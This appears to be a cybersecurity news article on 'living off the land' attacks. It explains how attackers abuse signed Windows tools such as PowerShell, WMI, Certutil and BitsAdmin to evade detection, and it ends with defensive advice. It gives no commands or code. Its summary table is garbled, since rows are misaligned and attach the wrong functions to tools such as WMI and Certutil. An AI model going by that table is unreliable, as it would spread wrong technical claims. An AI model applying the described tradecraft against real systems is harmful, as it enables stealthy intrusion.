Cybercriminals have found a more effective method to compromise Windows computers while evading detection by security software.
Ivan Spiridonov observed that uploading malicious tools, hackers are now using legitimate Windows programs already installed on target systems, a tactic known as “living off the land” (LOLBins, or Living Off the Land Binaries).
Unlike traditional attacks that rely on external tools like Mimikatz or PowerShell Empire, which are easily detected by endpoint detection and response (EDR) solutions.
Why This Method Works
This new approach leverages Microsoft-signed programs such as PowerShell, Windows Management Instrumentation (WMI), Certutil, and BitAdmin.
These tools are trusted by default because system administrators use them every day for legitimate work.
The appeal is straightforward: security software typically flags suspicious files, but Windows’ built-in tools are signed by Microsoft and allowed by default.
When attackers use these legitimate programs for malicious purposes, their activity blends seamlessly with normal administrative operations, making detection nearly impossible without sophisticated behavioral analysis.
A red team operator discovered this advantage firsthand during a security assessment. After uploading a password-dumping tool to a Windows machine, security staff detected and blocked the attack within 15 minutes.
But when using only built-in Windows utilities, the same operator-maintained access for three weeks, moved across 15 different systems, and extracted data without triggering a single security alert.
Common Living Off the Land Techniques
Attackers use various native Windows tools for different objectives. PowerShell handles reconnaissance and command execution.
WMI enables remote system queries and process creation. Scheduled tasks provide persistence without the need for suspicious executables. And Windows services enable long-term access with system-level privileges.
Criminals use Certutil to download files, BitAdmin for background transfers, DNS for covert tunneling, and even email applications to exfiltrate sensitive information.
Security teams face a nearly impossible challenge: they cannot simply block these tools because their own IT staff depends on them for normal operations.
Disabling PowerShell would break automation scripts. Removing WMI would damage system management capabilities.
This creates a fundamental dilemma: allow these tools and accept the risk, or block them and cripple legitimate business functions.
Defense requires a fundamental shift away from signature-based detection toward comprehensive logging and behavioral analysis.
| Utility / Feature | Malicious Function | Why It Evades Detection |
|---|---|---|
| PowerShell | Enables remote command execution on other systems. | It is a trusted Microsoft automation tool, so malicious scripts look like normal IT operations . |
| WMI (Windows Management Instrumentation) | Abused to download malicious payloads from the internet or exfiltrate stolen data. | Used for reconnaissance, dumping credentials, and moving laterally across the network. |
| Certutil.exe | Creates persistent access by setting up jobs that execute attacker code at specific times. | It is a legitimate certificate authority utility that is explicitly allowed by most security controls . |
| Scheduled Tasks | Used to establish persistence and modify system configurations. | Malicious tasks are disguised as legitimate system maintenance jobs . |
| Windows Registry | Malicious tasks are disguised as legitimate system maintenance jobs. | Allows attackers to execute commands without uploading files or using suspicious protocols. |
Security teams need PowerShell script block logging, command-line auditing, WMI activity monitoring, and tools such as Sysmon to track detailed system behavior.
Defenders should also implement strict application allow listing policies and monitor unusual process relationships, Ivan Spiridonov added.
Watch for suspicious network connections from administrative tools, and establish baselines for regular administrative activity.
These measures can identify when legitimate tools are being abused for malicious purposes, even if individual commands appear normal.
As attackers continue evolving their methods, organizations must move beyond blocking known tools and focus instead on detecting suspicious behavior patterns that indicate compromise, regardless of which legitimate application is being misused.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
